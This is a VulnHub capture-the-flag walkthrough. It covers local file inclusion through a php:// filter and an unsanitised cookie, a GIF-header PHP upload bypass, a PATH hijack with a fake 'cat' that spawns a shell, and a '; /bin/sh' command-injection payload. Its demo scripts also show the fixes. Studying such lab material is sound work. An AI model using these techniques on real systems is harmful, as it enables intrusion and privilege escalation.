Thanks to Claor @Chronicoder and VulnHub folks for the opportunity of writing another walkthrough for a very challenging vulnerable machine.
First things first, I fired up nmap. That is my usual routine: run nmap, and after that nikto. 😀

As can be observed, only two ports are of interest: 80 (HTTP) and 3306, on which MySQL runs.

Running nikto reveals the following information:

On port 80 there is a web application with an upload section, but in order to upload files we have to be authenticated:

The URL structure indicates that the application might be vulnerable to Local File Inclusion.

After some tests, I succeeded in including files from the server using the php://filter/convert.base64-encode/resource wrapper, which seems to be the only way of reading files. The base64 step matters: including a .php file directly would execute it, while the filter encodes the bytes before the include, so the source arrives in the response unexecuted.

The browser will display the source code of upload.php file encoded in base64:

With the same technique I read the source code of all the available php files. In index.php a piece of code caught my attention:

<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>

It looks like another way of doing local file inclusion: the cookie value is concatenated to "lang/" without any sanitisation, so a value starting with ../ climbs out of that directory. A quick test shows that it works as expected:

nikto had also revealed the existence of a config.php file, and with the technique above we can read its source code:

<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>

Recall that the machine has the MySQL port open; now that we have credentials for the database, we can connect to it.

In the database I also found the users and their base64-encoded passwords for the web application.

Now that we have the credentials, we can log into the application and look for a way to execute commands on the operating system.

The next step is to upload a file containing PHP code, but I soon realized that this is not an easy job. Having the source code of upload.php, I could see that the application restricts the extension, verifies that the Content-Type contains "image" and also verifies the MIME type of the content. So there is no way to upload a file with a .php extension.

What we can do is upload a file with a .gif extension whose content starts with a valid GIF header, followed by our PHP code. The extension, Content-Type and MIME checks all look at the name and the header, while include() will still execute the PHP embedded after it.

The file is uploaded to the /upload folder, with the original file name replaced by its MD5 hash.

Now we can use the LFI in the lang cookie to execute our uploaded shell.

Now it is time to enumerate the system, including running the LinEnum script for a comprehensive overview, but no low-hanging fruit was found.

Doing a quick review of the information gathered so far and trying to match everything up, I realized that I have some users and passwords from the MySQL database, and the same users are present on the system (/etc/passwd)… maybe the passwords are also valid on the operating system.

We observed a file called msgmike in kane's folder that is owned by user mike and also has the setuid bit set.

Running the file, we see that it generates an error about a missing file in mike's home. Analyzing the msgmike binary with strings, we can see the full command it runs, and also that cat is invoked through a relative path rather than an absolute one. This gives me an idea.

We can manipulate the PATH environment variable so that it points to a different cat program, one that spawns a shell for us 🙂

We modify PATH to begin with /tmp – the location where we will create a file named cat.

# typed in the shell we already have on the box
echo '#!/bin/sh' > /tmp/cat    # our fake cat: just spawn a shell
echo '/bin/sh' >> /tmp/cat
chmod +x /tmp/cat
export PATH=/tmp:$PATH         # /tmp is searched first, so "cat" now resolves to /tmp/cat

Now it's time to run msgmike again and get our shell as user mike:
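A self-contained demonstration of why the PATH trick works, as an added example that is not from the original walkthrough. It assumes msgmike does something equivalent to system("cat /home/mike/msg.txt"), i.e. /bin/sh -c with a bare "cat" that the shell resolves through the caller's PATH; instead of a setuid binary it runs that same sh -c command itself, and the planted cat writes a marker file instead of spawning a shell so the outcome can be checked. The absolute-path variant is the fix the binary should have used.

```shell
#!/bin/sh
# Added example, not the box's own binary. Assumed command behind msgmike:
# system("cat /home/mike/msg.txt"), simulated here with sh -c.

# Install a fake "cat" into $1 that records that it ran, and as which uid.
plant_fake_cat() {   # $1 = directory that will be prepended to PATH
    mkdir -p "$1"
    printf '#!/bin/sh\necho "hijacked cat ran as uid $(id -u)" > "%s/marker"\n' "$1" > "$1/cat"
    chmod +x "$1/cat"
}

# Vulnerable pattern: relative "cat" through sh -c, exactly what system(3)
# does. The target file need not exist; the lookup of "cat" happens first.
msgmike_relative() {   # $1 = file it tries to print
    sh -c "cat $1" 2>/dev/null || true
}

# What the binary should have done: absolute path, so PATH is irrelevant.
msgmike_absolute() {
    sh -c "/bin/cat $1" 2>/dev/null || true
}

# Run one variant with $1 at the front of PATH (in a subshell so the caller's
# PATH is untouched) and report "hijacked" or "safe".
try_hijack() {   # $1 = fake-cat dir, $2 = function to run
    rm -f "$1/marker"
    ( PATH="$1:$PATH"; export PATH; "$2" /home/mike/msg.txt )
    if [ -f "$1/marker" ]; then echo hijacked; else echo safe; fi
}

# Stand-alone demo: ./path_hijack.sh demo
if [ "${1:-}" = demo ]; then
    d=$(mktemp -d)
    plant_fake_cat "$d"
    echo "relative cat: $(try_hijack "$d" msgmike_relative)"
    echo "absolute cat: $(try_hijack "$d" msgmike_absolute)"
    cat "$d/marker" 2>/dev/null || true
    rm -rf "$d"
fi
```

Two caveats for the real binary. The dynamic loader's secure-execution mode strips LD_PRELOAD and LD_LIBRARY_PATH for setuid programs but leaves PATH alone, which is why this works at all. And the shell that system() spawns matters: dash (Debian's /bin/sh) keeps the effective uid, so the planted /tmp/cat runs as mike; if /bin/sh were bash, it would drop the effective uid back to the real one unless the program had already called setuid() itself. `strings msgmike | grep cat` is the quick check for whether the command is built with a bare cat or /bin/cat.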

In mike's home folder we also find a binary, this time owned by root and with the setuid bit set. Running it, it prompts for some input, echoes it back and exits.

Analyzing the binary with strings, we discover the command it runs.

It looks like command injection might be possible, and we give it a try.
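The injection itself, as an added example that is not from the original post. It assumes the root-owned binary splices the typed text into a shell command of the form /bin/echo <input> and hands it to system(3); the functions below reproduce that with sh -c. The payload ends the echo with a semicolon and runs a second command: on the box that command is /bin/sh, here it writes a marker file so the effect is checkable. The second function shows the same program passing the input as an argument instead of as part of the command string, which is what defeats the injection.

```shell
#!/bin/sh
# Added example, not the box's own binary. Assumed vulnerable command:
# system("/bin/echo <input>"), simulated with sh -c.

# Vulnerable pattern: user input is spliced into the command string, so the
# shell that parses the string also parses the input.
msg2root_vulnerable() {   # $1 = user input
    sh -c "/bin/echo $1"
}

# Safe pattern: input travels as an argv element (the "sh" word is $0), is
# expanded inside double quotes, and is never re-parsed as shell syntax.
msg2root_safe() {
    sh -c '/bin/echo "$1"' sh "$1"
}

# Injection payload: terminate echo, then run the attacker's command.
# Real run: 'hello; /bin/sh'. Here: a marker write to $1 so we can check it.
injection_payload() {   # $1 = marker file
    printf 'hello; echo pwned > %s' "$1"
}

# Feed the payload to one variant and report whether the injected command ran.
probe() {   # $1 = function name, $2 = marker path
    rm -f "$2"
    "$1" "$(injection_payload "$2")" >/dev/null
    if [ -f "$2" ]; then echo injected; else echo contained; fi
}

# Stand-alone demo: ./msg2root_injection.sh demo
if [ "${1:-}" = demo ]; then
    m=$(mktemp)
    echo "vulnerable: $(probe msg2root_vulnerable "$m")"
    echo "safe:       $(probe msg2root_safe "$m")"
    rm -f "$m"
fi
```

Against the real binary the same idea applies at the prompt: anything the shell treats as a command separator (`;`, `&&`, `||`, a newline, or `$(...)`) that survives into the system() string ends the echo and starts a root shell.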

And now, by the power vested in me by the state of root, I present to you the content of flag.txt: